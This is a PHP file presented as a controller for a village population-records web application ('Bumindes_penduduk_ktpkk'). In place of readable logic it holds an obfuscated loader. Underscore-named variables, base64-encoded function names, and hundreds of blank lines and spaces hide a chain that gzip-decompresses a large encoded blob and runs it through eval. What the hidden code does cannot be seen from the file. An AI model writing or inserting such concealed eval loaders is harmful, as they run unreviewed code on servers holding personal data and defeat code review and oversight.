<?php 
        $__='printf';$_='Loading donjo-app/controllers/Bumindes_penduduk_ktpkk.php';
        







































































































































































































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if(!function_exists('__lambda')){function __lambda($sArgs,$sCode){return eval("return function($sArgs){{$sCode}};");}}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='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';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      






































































































































































































































































































                                                                                                                                                                                                                     $________;
